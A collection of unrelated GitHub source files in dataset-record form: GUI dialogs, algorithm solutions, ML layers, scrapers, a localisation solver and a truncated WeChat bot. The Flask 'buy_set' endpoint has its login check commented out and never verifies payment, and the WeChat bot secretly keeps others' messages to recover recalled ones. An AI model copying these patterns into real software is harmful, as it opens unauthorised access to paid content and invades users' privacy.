self.model[SENSOR_ID_REGEX] is not None and self.model[SENSOR_ID_REGEX] != '':\n self.checkBox_regex.setChecked(True)\n self.lineEdit_regex.setText(self.model[SENSOR_ID_REGEX])\n else:\n self.checkBox_regex.setChecked(False)\n\n def open_next_dialog(self):\n if self.groupBox_sensor_id.isChecked():\n self.model[SENSOR_ID_ROW] = self.spinBox_row.value() - 1\n self.model[SENSOR_ID_COLUMN] = self.spinBox_column.value() - 1 if self.checkBox_column.isChecked() else -1\n self.model[SENSOR_ID_REGEX] = self.lineEdit_regex.text() if self.checkBox_regex.isChecked() else ''\n else:\n self.model[SENSOR_ID_ROW] = -1\n self.model[SENSOR_ID_COLUMN] = -1\n self.model[SENSOR_ID_REGEX] = ''\n\n dialog = SensorModelColumnNamesDialog(\n self.sensor_controller,\n self.model,\n model_id=self.model_id,\n test_file=self.test_file,\n parent=self.parent)\n self.close()\n dialog.exec()\n\n def open_previous_dialog(self):\n from gui.dialogs.new_sensor_model_date_dialog import SensorModelDateDialog\n\n dialog = SensorModelDateDialog(\n self.sensor_controller,\n self.model,\n model_id=self.model_id,\n test_file=self.test_file,\n parent=self.parent\n )\n self.close()\n dialog.exec()\n","repo_name":"jacob-kamminga/AI-Sensus","sub_path":"gui/dialogs/new_sensor_model_id_dialog.py","file_name":"new_sensor_model_id_dialog.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"17402791645","text":"\n# Neetcode - HashMap, TC = O(n), SC = O(n)\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> 
List[int]:\n \n prevMap = {}\n \n for i, n in enumerate(nums):\n diff = target - n\n if diff in prevMap:\n return [prevMap[diff], i]\n prevMap[n] = i\n\n\n\n# # My code - Brute force, TC = O(n^2), SC = O(1)\n# class Solution:\n# def twoSum(self, nums: List[int], target: int) -> List[int]:\n# i = 0\n# for i in range(i, len(nums)):\n# j = i + 1\n# for j in range(j, len(nums)):\n# if nums[i] + nums[j] == target:\n# return [i, j]","repo_name":"MinsuKin/leetcode","sub_path":"1. Two Sum.py","file_name":"1. Two Sum.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2953096023","text":"import torch\n\nclass TextBox(torch.nn.Module):\n \n def __init__(self, in_channels, mbox=[4, 6, 6, 6, 4, 4]):\n super(TextBox, self).__init__()\n # text + background\n self.num_classes = 2\n # (x, y, w, h)\n self.loc_layers = torch.nn.ModuleList([\n torch.nn.Conv2d(in_channels, num_box * 4, (3, 5), padding=(1, 2)) for num_box in mbox\n ])\n # (x1, y1, x2, y2, x3, y3, x4, y4)\n self.quad_layers = torch.nn.ModuleList([\n torch.nn.Conv2d(in_channels, num_box * 8, (3, 5), padding=(1, 2)) for num_box in mbox\n ])\n # (x1, y1, x2, y2, h)\n self.rot_layers = torch.nn.ModuleList([\n torch.nn.Conv2d(in_channels, num_box * 5, (3, 5), padding=(1, 2)) for num_box in mbox\n ])\n self.conf_layers = torch.nn.ModuleList([\n torch.nn.Conv2d(in_channels, num_box * self.num_classes, (3, 5), padding=(1, 2)) for num_box in mbox\n ])\n\n def forward(self, feature_pyramids):\n locations = []\n quadrilaterals = []\n rotates = []\n confidences = []\n\n for (x, l, q, r, c) in zip(feature_pyramids, self.loc_layers, self.quad_layers, self.rot_layers, self.conf_layers):\n locations.append(l(x).permute(0, 2, 3, 1).contiguous())\n quadrilaterals.append(q(x).permute(0, 2, 3, 1).contiguous())\n rotates.append(r(x).permute(0, 2, 3, 1).contiguous())\n confidences.append(c(x).permute(0, 2, 3, 1).contiguous())\n \n locations = torch.cat([loc.view(loc.shape[0], -1) for loc in locations], 1)\n quadrilaterals = torch.cat([quad.view(quad.shape[0], -1) for quad in quadrilaterals], 1)\n rotates = torch.cat([rot.view(rot.shape[0], -1) for rot in rotates], 1)\n confidences = torch.cat([con.view(con.shape[0], -1) for con in confidences], 1)\n \n return (torch.cat([locations.view(locations.shape[0], -1, 4), \n quadrilaterals.view(quadrilaterals.shape[0], -1, 8),\n rotates.view(rotates.shape[0], -1, 5)],\n dim=2),\n confidences.view(confidences.shape[0], -1, self.num_classes))\n\n","repo_name":"BongkyuHwang/m2det","sub_path":"lib/layers/modules/text_box.py","file_name":"text_box.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10651418797","text":"#!/usr/bin/env python3\n\n__author__ = \"Fabian Golle \"\n__copyright__ = \"Fabian Golle \"\n__version__ = \"1.0\"\n__revision__ = \"f0b3ab7\"\n__status__ = \"Production\"\n\ndef abort(message):\n\tprint(message)\n\tquit()\n\ntry:\n\tfrom huvorffman import Huffman\n\tfrom rle import RunLenghtEncoding\nexcept Exception:\n\tabort('Import-failure')\n\n\ntestcases = [\n\t'abcdefghijklmnopqrstuvwxyz',\n\t'äüöß',\n\t'!\"§$%&/()=?=)(/&%$§\"',\n\t'¡“¶¢[]|{}≠¿',\n\t'1234567890',\n];\n\ni = 0\nfor t in testcases:\n\ttry:\n\t\thuff = Huffman()\n\t\trl = RunLenghtEncoding()\n\n\t\tencoded = huff.encode(t)\n\t\tif (t != huff.decode(encoded)):\n\t\t\traise Exception\n\n\t\tencoded = rl.encode(t)\n\t\tdecoded = 
rl.decode(encoded)\n\t\tif (t != decoded):\n\t\t\traise Exception\n\t\t\t\n\texcept Exception as e:\n\t\tprint(\"Testcase failed!\")\n\t\tprint(\"Input: \"+str(t))\n\t\tprint(\"Output: \"+str(decoded))\n\t\tif (len(str(e)) > 0):\n\t\t\tprint('Exception: ' + str(e))\n\telse:\n\t\ti += 1\n\nprint(str(i)+' of '+str(len(testcases))+' Testcases succeed')","repo_name":"micronax/python_huffman_rle_compressor","sub_path":"testcases.py","file_name":"testcases.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"26204721654","text":"# -*- coding: utf-8 -*-\nfrom flask import Blueprint, jsonify, request\nfrom flask.ext.login import login_required, current_user\nfrom app.api import auto, db\nfrom app.api.constants import BAD_REQUEST, OK\nfrom app.api.recipes.views_v2 import recipe_response_builder, set_response_builder\nfrom app.api.sets.model import Set, UserSet, VendorSet\nfrom app.api.users.constants import FOREVER\n\n\nmod = Blueprint('sets', __name__, url_prefix='/api_v2/sets')\n\n@auto.doc()\n@mod.route('/<int:id>', methods=['GET'])\ndef get_set(id):\n \"\"\"\n Get information about set.\n :param id: set id\n :return: json with parameters:\n error_code - server response_code\n result - information about category\n \"\"\"\n lang = request.args.get('lang', type=unicode, default=u'en')\n vendor_id = request.args.get('vendor_id', type=unicode, default=u'')\n set = Set.query.get(id)\n if not set:\n return jsonify({'error_code': BAD_REQUEST, 'result': 'not ok'}), 200 # set with `id` doesn't exist\n information = set_response_builder(set, lang, vendor_id)\n information['recipes'] = []\n for recipe in set.recipes:\n information['recipes'].append(recipe_response_builder(recipe, lang, vendor_id))\n return jsonify({'error_code': OK, 'result': information}), 200\n\n\n@auto.doc()\n@mod.route('/', methods=['GET'])\ndef get_all_sets():\n \"\"\"\n Get information about all existing sets.\n :param offset (GET param) : starts from which set\n :param limit (GET param) : how many sets you want to get\n :return: json with parameters:\n error_code - server response_code\n result - information about sets\n entities_count - number of sets\n ids - ids of all sets\n \"\"\"\n lang = request.args.get('lang', type=unicode, default=u'en')\n vendor_id = request.args.get('vendor_id', type=unicode, default=u'')\n sets = []\n offset = request.args.get('offset', default=0, type=int)\n limit = request.args.get('limit', type=int)\n count = Set.query.count()\n # if limit is not None and offset is not None:\n # sets_band = Set.query.slice(start=offset, stop=limit+offset).all()\n # else:\n # sets_band = Set.query.all()\n sets_band = Set.query.all()\n for set in sets_band:\n information = set_response_builder(set, lang, vendor_id)\n sets.append(information)\n sets = sorted(sets, key=lambda k: k['is_open'], reverse=True)\n if limit is not None and offset is not None:\n sets = sets[offset:limit+offset]\n ids = []\n sets_ids = Set.query.all()\n for set_id in sets_ids:\n ids.append(set_id.id)\n return jsonify({'error_code': OK, 'result': sets, 'ids': ids, 'entities_count': count}), 200\n\n\n@auto.doc()\n@mod.route('/buy_set', methods=['POST'])\n# @login_required\ndef buy_set():\n \"\"\"\n Buy set with store id in json. 
List of parameters in json request (one of them is required):\n store_id\n Example of request:\n {\"store_id\": \"1\"}\n :return: json with parameters:\n error_code - server response_code\n result - information about set\n \"\"\"\n lang = request.args.get('lang', type=unicode, default=u'en')\n vendor_id = request.args.get('vendor_id', type=unicode, default=u'')\n store_id = request.json.get('store_id')\n if store_id is None:\n return jsonify({'error_code': BAD_REQUEST, 'result': 'missing arguments'}), 200 # missing arguments\n set = Set.query.filter_by(store_id=store_id).first()\n if not set:\n set = Set.query.filter_by(sale_store_id=store_id).first()\n if not set:\n return jsonify({'error_code': BAD_REQUEST, 'result': 'set not exist'}), 200\n # user_set = UserSet(user_id=current_user.id, set_id=set.id, open_type=FOREVER)\n vendor_set = VendorSet(vendor_id=vendor_id, set_id=set.id)\n db.session.add(vendor_set)\n db.session.commit()\n information = set_response_builder(set, lang, vendor_id)\n information['recipes'] = []\n for recipe in set.recipes:\n information['recipes'].append(recipe_response_builder(recipe, lang, vendor_id))\n return jsonify({'error_code': OK, 'result': information}), 200\n","repo_name":"megge-dream/culinaryon","sub_path":"app/api/sets/views_v2.py","file_name":"views_v2.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26022815783","text":"import time\r\n\r\nfrom cv2 import cvtColor, COLOR_RGB2GRAY, COLOR_GRAY2RGB\r\nimport os\r\n\r\nos.environ[\"IMAGEIO_FFMPEG_EXE\"] = 'ffmpeg.exe'\r\nfrom moviepy.video.io.VideoFileClip import VideoFileClip\r\nfrom moviepy.video.io.ImageSequenceClip import ImageSequenceClip\r\nfrom moviepy.video.io.preview import preview\r\nimport pygame\r\n\r\n#works without the .exe also\r\npygame.init()\r\n\r\npygame.display.set_caption('Show Video on screen')\r\n\r\nvideo = VideoFileClip('contents/videos/video.mp4')\r\n\r\nduration = video.duration\r\nfps = video.fps\r\ncount =1\r\ngray_frames = []\r\n\r\ndef gray(image):\r\n \"\"\"Converts an RGB frame to grayscale, returned as a 3-channel RGB image \"\"\"\r\n gray = cvtColor(image, COLOR_RGB2GRAY)\r\n rgb= cvtColor(gray,COLOR_GRAY2RGB)\r\n return rgb # remember that image is a numpy array\r\n\r\nnew_frames = [ gray(frame) for frame in video.iter_frames()]\r\ntime.sleep(1)\r\n\r\nclips = ImageSequenceClip(new_frames, fps = fps, durations = duration)\r\n#\r\npreview(clips)\r\n\r\n# clips.write_videofile(\"contents/videos/video_gray.mp4\")\r\npygame.quit()\r\n\r\n","repo_name":"southglory/small_works","sub_path":"Contents2exe_distrib/mp4_showAsGray.py","file_name":"mp4_showAsGray.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32349819594","text":"#!/usr/bin/env python\n## This script was from a stack-overflow recommendation hosted on a github gist\n\"\"\"strip outputs from an IPython Notebook\n \nOpens a notebook, strips its output, and writes the outputless version to the original file.\n \nUseful mainly as a git pre-commit hook for users who don't want to track output in VCS.\n \nThis does mostly the same thing as the `Clear All Output` command in the notebook UI.\n\"\"\"\n\nimport io\nimport sys\n\nfrom IPython.nbformat import current\n\n\ndef strip_output(nb):\n \"\"\"strip the outputs from a notebook object\"\"\"\n nb.metadata.pop(\"signature\", None)\n for cell in nb.worksheets[0].cells:\n if \"outputs\" in cell:\n 
cell[\"outputs\"] = []\n if \"prompt_number\" in cell:\n cell[\"prompt_number\"] = None\n return nb\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print(\"USAGE: {0} \".format(sys.argv[0]))\n print(\"\")\n print(\"for i in *.ipynb; do ./{0} $i; done\".format(sys.argv[0]))\n sys.exit(-1)\n filename = sys.argv[1]\n with io.open(filename, \"r\", encoding=\"utf8\") as f:\n nb = current.read(f, \"json\")\n nb_out = strip_output(nb)\n if nb != nb_out:\n with io.open(filename, \"w\", encoding=\"utf8\") as f:\n current.write(nb_out, f, \"json\")\n sys.exit(1)\n sys.exit(0)\n","repo_name":"InsightSoftwareConsortium/SimpleITK-Notebooks","sub_path":"Utilities/ClearAllOutputs.py","file_name":"ClearAllOutputs.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":769,"dataset":"github-code","pt":"3"} +{"seq_id":"44449329231","text":"\"\"\"\nExercício Python 44: Elabore um programa que calcule o valor a ser pago por um produto,\nconsiderando o seu preço normal e condição de pagamento:\n\n– à vista dinheiro/cheque: 10% de desconto\n\n– à vista no cartão: 5% de desconto\n\n– em até 2x no cartão: preço formal\n\n– 3x ou mais no cartão: 20% de juros\n\n\"\"\"\nprint('=+'*20)\nprint('{:=^40}'.format(' VENDA DE PRODUTOS '))\nprint('=+'*20)\nprint('\\n')\nvalor_produto = float(input('Informe o valor do produto: '))\nforma_pagamento = int(input('''Formas de pagamento\n1 - À vista dinheiro ou cheque: 10% de desconto\n2 – à vista no cartão: 5% de desconto\n3 – em até 2x no cartão: preço formal\n4 - 3x ou mais no cartão: 20% de juros \nEscolha a opção: '''))\n\nif forma_pagamento == 1:\n preco_final = valor_produto - (valor_produto * 0.10)\n print(f'Valor total a pagar à vista com desconto de 10%: R${preco_final:.2f}.')\nelif forma_pagamento == 2:\n preco_final = valor_produto - (valor_produto * 0.05)\n # print(f'Valor das parcelas: R${preco_final/2:.2f}.')\n print(f'Valor total a pagar à vista no cartão com 5% de desconto: R${preco_final:.2f}.')\nelif forma_pagamento == 3:\n preco_final = valor_produto\n print(f'Valor das parcelas: R${preco_final / 2:.2f}.')\n print(f'Valor total a pagar à vista em até 2x no cartão: R${preco_final:.2f}.')\nelif forma_pagamento == 4:\n qtd_parcelas = int(input('Informe a quantidade de parcelas:'.strip()))\n preco_final = valor_produto + (valor_produto * 0.20)\n print(f'Valor das parcelas: R${preco_final/qtd_parcelas:.2f}.')\n print(f'Valor total a pagar em {qtd_parcelas}x no cartão com 20% de juros: R${preco_final:.2f}.')\n\nelse:\n print('OPÇÃO INVÁLIDA! 
Tente novamente.')\n","repo_name":"jandersoncoelho/expython","sub_path":"ex044.py","file_name":"ex044.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14184685302","text":"import numpy as np\nimport cv2\nfrom code_centres_script import codes_centres\n\n#N_SOLVE_ITERATIONS = 15\nN_SOLVE_ITERATIONS = 30\n\nCODE_SIZE_REAL = 117.0 # mm\n\nMM_IN_CM = 10.0\n\n\ncodes_centres = np.asarray(codes_centres)\ncodes_centres[:, 2:4] = MM_IN_CM * codes_centres[:, 2:4]\nn_codes = codes_centres.shape[0]\n\nPOSITIONS_CODES_REAL = np.zeros((n_codes, 2, 2), np.float32)\n#POSITIONS_CODES_REAL[code_no, point_no, x/y]\nNOS_CODES_REAL = np.zeros((n_codes), np.int64)\n\nfor point_index in range(n_codes):\n code_centre = codes_centres[point_index, :]\n place_no = code_centre[0]\n angle = code_centre[1]\n x = code_centre[2]\n y = code_centre[3]\n \n x11 = - CODE_SIZE_REAL / 2\n y11 = 0.0\n x12 = CODE_SIZE_REAL / 2\n y12 = 0.0\n \n angle_radians = np.pi * angle / 180.0\n sin = np.sin(angle_radians)\n cos = np.cos(angle_radians)\n \n \n \n x21 = x11 * cos + y11 * (-sin)\n y21 = x11 * sin + y11 * cos\n \n x22 = x12 * cos + y12 * (-sin)\n y22 = x12 * sin + y12 * cos\n \n \n \n x31 = x21 + x\n y31 = y21 + y\n \n x32 = x22 + x\n y32 = y22 + y\n \n \n \n POSITIONS_CODES_REAL[point_index, 0, 0] = x31\n POSITIONS_CODES_REAL[point_index, 0, 1] = y31\n POSITIONS_CODES_REAL[point_index, 1, 0] = x32\n POSITIONS_CODES_REAL[point_index, 1, 1] = y32\n \n NOS_CODES_REAL[point_index] = place_no\n #print('NOS_CODES_REAL[point_index] =', NOS_CODES_REAL[point_index])\n\n\n\n\n\nX_TO_ANGLE_X_LIMITS = [90, 1270]\nX_TO_ANGLE_TAILOR_COEFFS = \\\n [-0.002227464637962487, 0.3212660622990047, -0.003478867250403373, 0.1909035743393775, -0.0044976791528199165, 0.12648175837018866, -0.005129167400927317]\nX_TO_ANGLE_FX = 617.8249050804442\nX_TO_ANGLE_CX = 673.0536941293645\n\n#POSITIONS_CODES_REAL[code_no, point_no, x/y]\n# get real codes normals\nnormals_real_codes = np.zeros((POSITIONS_CODES_REAL.shape[0], 2), np.float32)\ntangents_real_codes = POSITIONS_CODES_REAL[:, 1, :] - POSITIONS_CODES_REAL[:, 0, :]\ncenters_real_codes = (POSITIONS_CODES_REAL[:, 1, :] + POSITIONS_CODES_REAL[:, 0, :]) / 2\ntangents_real_codes = tangents_real_codes / np.sqrt(np.sum(tangents_real_codes**2, axis=1, keepdims=True))\n\nnormals_real_codes[:, 0] = -tangents_real_codes[:, 1]\nnormals_real_codes[:, 1] = tangents_real_codes[:, 0]\n\n\ndef select_codes_in_limits(x_detected_all, y_detected_all, code_detected_all, code_size_all, x_detected_pairs_all, y_detected_pairs_all):\n \n \n if x_detected_all.size > 0:\n condition = (X_TO_ANGLE_X_LIMITS[0] <= x_detected_pairs_all) & (x_detected_pairs_all <= X_TO_ANGLE_X_LIMITS[1])\n condition_codewise = np.all(condition, axis=1)\n \n x_detected_all = x_detected_all[condition_codewise]\n y_detected_all = y_detected_all[condition_codewise]\n code_detected_all = code_detected_all[condition_codewise]\n code_size_all = code_size_all[condition_codewise]\n x_detected_pairs_all = x_detected_pairs_all[condition_codewise, :]\n y_detected_pairs_all = y_detected_pairs_all[condition_codewise, :]\n \n return x_detected_all, y_detected_all, code_detected_all, code_size_all, x_detected_pairs_all, y_detected_pairs_all\n\ndef x_to_angle(x):\n xss = (x - X_TO_ANGLE_CX) / X_TO_ANGLE_FX\n xs = np.copy(xss)\n power = np.copy(xss)\n for monom_index in range(len(X_TO_ANGLE_TAILOR_COEFFS)):\n power *= xss\n xs += X_TO_ANGLE_TAILOR_COEFFS[monom_index] 
* power\n angles = np.arctan(xs)\n return angles\n\ndef select_existed_codes(x_detected_all, y_detected_all, code_detected_all, code_size_all, x_detected_pairs_all, y_detected_pairs_all):\n \n \n if x_detected_all.size > 0:\n \n condition_codewise = np.zeros(x_detected_all.size, np.bool)\n for detected_index in range(code_detected_all.size):\n index_found = np.where(NOS_CODES_REAL == code_detected_all[detected_index])[0]\n if index_found.size == 1:\n condition_codewise[detected_index] = True\n\n \n \n \n x_detected_all = x_detected_all[condition_codewise]\n y_detected_all = y_detected_all[condition_codewise]\n code_detected_all = code_detected_all[condition_codewise]\n code_size_all = code_size_all[condition_codewise]\n x_detected_pairs_all = x_detected_pairs_all[condition_codewise, :]\n y_detected_pairs_all = y_detected_pairs_all[condition_codewise, :]\n \n return x_detected_all, y_detected_all, code_detected_all, code_size_all, x_detected_pairs_all, y_detected_pairs_all\n\n \n \ndef localize(x_detected_all, y_detected_all, code_detected_all, code_size_all, x_detected_pairs_all, y_detected_pairs_all):\n \n x_detected_all, y_detected_all, code_detected_all, code_size_all, x_detected_pairs_all, y_detected_pairs_all = \\\n select_codes_in_limits(x_detected_all, y_detected_all, code_detected_all, code_size_all, x_detected_pairs_all, y_detected_pairs_all)\n \n x_detected_all, y_detected_all, code_detected_all, code_size_all, x_detected_pairs_all, y_detected_pairs_all = \\\n select_existed_codes(x_detected_all, y_detected_all, code_detected_all, code_size_all, x_detected_pairs_all, y_detected_pairs_all)\n \n is_localized = False\n current_solution = np.zeros((3, 1), np.float32)\n current_solution_iterations = None\n right_side_iterations = None\n angles_detected_pairs_all = None\n detected_to_real_indexing = None\n if x_detected_all.size >= 2: # must be at least two codes\n \n \n angles_detected_pairs_all = x_to_angle(x_detected_pairs_all)\n angles_detected_pairs_all = -angles_detected_pairs_all[:,::-1] # because upsidedown\n\n\n ## sort by 1st point, not necessary because it will be resorted by code:\n #sort_indexes = np.argsort(angles_detected_pairs_all[:, 0])\n #angles_detected_pairs_all = angles_detected_pairs_all[sort_indexes, :]\n #code_detected_all = code_detected_all[sort_indexes]\n \n # sort inside pairs in inverse order because real and detected orders in pair are opposite:\n for detected_index in range(angles_detected_pairs_all.shape[0]):\n sort_indexes = np.argsort(angles_detected_pairs_all[detected_index, :])[::-1]\n angles_detected_pairs_all[detected_index, :] = angles_detected_pairs_all[detected_index, sort_indexes]\n \n #print('code_detected_all =', code_detected_all)\n #print('angles_detected_pairs_all * 180 / np.pi =', angles_detected_pairs_all * 180 / np.pi )\n \n \n angular_sizes_detected_all = angles_detected_pairs_all[:, 0] - angles_detected_pairs_all[:, 1]\n \n \n for detected_index in range(code_detected_all.size):\n index_found = np.where(NOS_CODES_REAL == code_detected_all[detected_index])[0]\n \n # match detected and real indexing by codes:\n \n detected_to_real_indexing = np.zeros(code_detected_all.size, np.int64)\n for detected_index in range(code_detected_all.size):\n index_found = np.where(NOS_CODES_REAL == code_detected_all[detected_index])[0]\n if index_found.size == 1:\n detected_to_real_indexing[detected_index] = index_found\n else:\n print('index_found.size != 1 something wrong', index_found.size)\n \n \n\n # initial guess:\n max_index = 
np.argmax(angular_sizes_detected_all)\n max_index_real = detected_to_real_indexing[max_index]\n distance_estimate = CODE_SIZE_REAL / angular_sizes_detected_all[max_index]\n xy_initial = centers_real_codes[max_index_real, :] + distance_estimate * normals_real_codes[max_index_real, :]\n #xy_initial[0] = 1887\n #xy_initial[1] = 1704 # for debug, this is probably real point\n directions_for_estimate = centers_real_codes - xy_initial\n directions_for_estimate_normalized = directions_for_estimate / np.sqrt(np.sum(directions_for_estimate **2, axis=1, keepdims=True))\n mean_direction = np.sum(directions_for_estimate_normalized, axis=0)\n #mean_direction = mean_direction / np.sqrt(np.sum(mean_direction**2))\n angle_initial = np.arctan2(mean_direction[1], mean_direction[0])\n \n # iterations:\n right_side = np.zeros(angles_detected_pairs_all.shape[0] * 2, np.float32)\n dot_products = np.zeros(angles_detected_pairs_all.shape[0] * 2, np.float32)\n ray_angle_all = np.zeros(angles_detected_pairs_all.shape[0] * 2, np.float32)\n jacobain = np.zeros((angles_detected_pairs_all.shape[0] * 2, 3), np.float32)\n initial_solution = np.zeros((3, 1), np.float32)\n initial_solution[0, 0] = xy_initial[0]\n initial_solution[1, 0] = xy_initial[1]\n initial_solution[2, 0] = angle_initial\n # F_i = 1 - dot_product = 1 - ((x_i - x) * cos(gamma - alpha) / sqrt((x_i - x)**2 + (y_i - y)**2) + (y_i - y) * sin(gamma - alpha) / sqrt((x_i - x)**2 + (y_i - y)**2)\n # F(X) = 0\n # F(X + dX) = 0\n # F(X) + J*dX = 0\n # J*dX = -F(X)\n # X_i+1 = X_i + learning_rate * dX\n \n #initial_solution[0, 0] = -673.0\n #initial_solution[1, 0] = 1189.0\n #initial_solution[2, 0] = -0.9797\n \n \n #print('detected_to_real_indexing =', detected_to_real_indexing)\n \n #print('real prepared: ', POSITIONS_CODES_REAL[detected_to_real_indexing, :, :])\n \n current_solution = np.copy(initial_solution)\n current_solution_iterations = np.zeros((3, N_SOLVE_ITERATIONS + 1), np.float32)\n current_solution_iterations[:, 0] = current_solution.flatten()\n right_side_iterations = np.zeros((N_SOLVE_ITERATIONS + 1, angles_detected_pairs_all.shape[0] * 2), np.float32)\n right_side_iterations[0, :] = right_side\n #dst_mean = np.zeros((3, 1), np.float32)\n for iterations_index in range(N_SOLVE_ITERATIONS):\n global_index = 0\n for detected_index in range(angles_detected_pairs_all.shape[0]):\n index_real = detected_to_real_indexing[detected_index]\n for in_pair_index in range(2):\n angle_code = angles_detected_pairs_all[detected_index, in_pair_index]\n ray_angle = current_solution[2, 0] - angle_code\n \n # POSITIONS_CODES_REAL[code_no, point_no, x/y]\n x_real = POSITIONS_CODES_REAL[index_real, in_pair_index, 0]\n y_real = POSITIONS_CODES_REAL[index_real, in_pair_index, 1]\n sin_ray_angle = np.sin(ray_angle)\n cos_ray_angle = np.cos(ray_angle)\n dx = (x_real - current_solution[0, 0])\n dy = (y_real - current_solution[1, 0])\n dx2 = dx**2\n dy2 = dy**2\n distance = np.sqrt(dx2 + dy2)\n right_side[global_index] = -(1 - ((dx * cos_ray_angle + dy * sin_ray_angle) / distance))\n dot_products[global_index] = (x_real - current_solution[0, 0]) * cos_ray_angle + (y_real - current_solution[1, 0]) * sin_ray_angle\n distance3 = distance**3\n #jacobain[global_index, 0] = dy2 * cos_ray_angle / distance3\n #jacobain[global_index, 1] = dx2 * sin_ray_angle / distance3\n jacobain[global_index, 0] = -((dx * (sin_ray_angle * dy + cos_ray_angle * dx) / distance3) - (cos_ray_angle / distance))\n jacobain[global_index, 1] = -((dy * (sin_ray_angle * dy + cos_ray_angle * dx) / distance3) - 
(sin_ray_angle / distance))\n jacobain[global_index, 2] = - ((dx * (-sin_ray_angle) + dy * cos_ray_angle) / distance)\n \n #if iterations_index == (N_SOLVE_ITERATIONS - 1):\n # print('x_real =', x_real, ' y_real =', y_real, 'ray_angle =', ray_angle * 180 / np.pi)\n \n global_index += 1\n retval, dst\t= cv2.solve(jacobain, right_side, None, cv2.DECOMP_SVD)\n \n #if iterations_index == (N_SOLVE_ITERATIONS - 1):\n # print('right_side =', right_side)\n # print('jacobain =', jacobain)\n # print('retval =',retval)\n # print('dst =', dst)\n # print('current_solution[0: 2, 0] =', current_solution[0: 2, 0])\n # print('current_solution[2, 0] =', current_solution[2, 0] * 180 / np.pi)\n \n \n \n #beta = 0.3\n #dst_mean = beta * dst_mean + (1 - beta) * dst\n \n #print(' ')\n #print('retval =', retval)\n #print('right_side =', right_side)\n #print('np.max(-right_side) =', np.max(-right_side))\n #print('dot_products =', dot_products)\n #print('current_solution =', current_solution)\n \n current_solution = current_solution + 0.7 * dst\n \n current_solution_iterations[:, iterations_index + 1] = current_solution.flatten()\n right_side_iterations[iterations_index + 1, :] = right_side\n \n is_localized = True\n return is_localized, current_solution, current_solution_iterations, right_side_iterations, code_detected_all, angles_detected_pairs_all, detected_to_real_indexing\n","repo_name":"vedenev/buggy","sub_path":"raw_codes/localize_2020_12_04.py","file_name":"localize_2020_12_04.py","file_ext":"py","file_size_in_byte":13395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30899635304","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\n\nimport scrapy\nfrom scrapy.pipelines.images import ImagesPipeline\nfrom pymongo import MongoClient\n\n\nclass LeroymerlinPipeline:\n def __init__(self):\n client = MongoClient('localhost')\n self.mongo_base = client.leroymerlin\n\n def process_item(self, item, spider):\n item = process_item_props(item)\n collection = self.mongo_base[spider.name]\n collection.update_one({'link': item['link']}, {'$set': item}, upsert=True)\n return item\n\nclass LeroymerlinPhoptosPipeline(ImagesPipeline):\n def get_media_requests(self, item, info):\n if item['photos']:\n for img in item['photos']:\n try:\n yield scrapy.Request(img)\n except Exception as e:\n print(e)\n\n def item_completed(self, results, item, info):\n if results:\n item['photos'] = [itm[1] for itm in results if itm[0]]\n return item\n\ndef process_item_props(item):\n len_defs = len(item['props_definition'])\n item['props'] = {}\n for i, term in enumerate(item['props_term']):\n if i < len_defs:\n item['props'][term] = item['props_definition'][i]\n else:\n item['props'][term] = \"-\"\n\n item.pop('props_term')\n item.pop('props_definition')\n\n return item","repo_name":"anastasia-kucherova/geekbrains_data_mining","sub_path":"lesson7/leroymerlin/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24594296662","text":"#! 
/usr/local/bin/python3\n# -*- coding: utf-8 -*-\nimport re, time, os\nfrom servers.vendor.itchat.content import *\nfrom servers.vendor.itchat import send\nfrom servers.vendor.itchat import search_friends\n\nfrom servers.utils.wechatLog import *\nfrom servers.utils.wechatRecord import *\n\n\nclass Revoke():\n timeout = 130.0 # maximum message retention time; entries older than this are purged\n msg = None # message currently being processed\n revokeFlag = [u'\u64a4\u56de\u4e86\u4e00\u6761\u6d88\u606f', 'recalled a message'] # markers meaning \"recalled a message\"\n msgLibrayDic = {} # cache of all recorded messages\n\n def saveMessage(self, msg, userConfig):\n self.msg = msg\n userName = userConfig[\"userName\"]\n if msg['Type'] in [SYSTEM, NOTE]: return # do not save these message types\n if msg['ToUserName'] == userName: # the message is addressed to this account\n recordUserConfig({\"recMsgCount\" : 1}, \"count\") # increment received-message counter\n elif msg[\"FromUserName\"] == userName: # the message was sent by this account\n recordUserConfig({\"sendMsgCount\" : 1}, \"count\") # increment sent-message counter\n return # do not save our own outgoing messages\n msgId = msg['MsgId']\n msgFromUserId = msg['FromUserName']\n msgFromNick = search_friends(userName=msgFromUserId)['NickName']\n msgCreateTime = msg['CreateTime']\n msgCreateTime_t = self.timeTodate(msgCreateTime)\n\n if msg['Type'] in [PICTURE, RECORDING, ATTACHMENT, VIDEO]:\n if not os.path.exists(RECEIVEFILES): os.makedirs(RECEIVEFILES)\n msgContent = RECEIVEFILES + msg.fileName\n msg.download(msgContent)\n elif msg['Type'] in [SHARING]:\n msgContent = msg['Text'] + '\\t' + msg['Url']\n elif msg['Type'] in [MAP]:\n x, y, location = 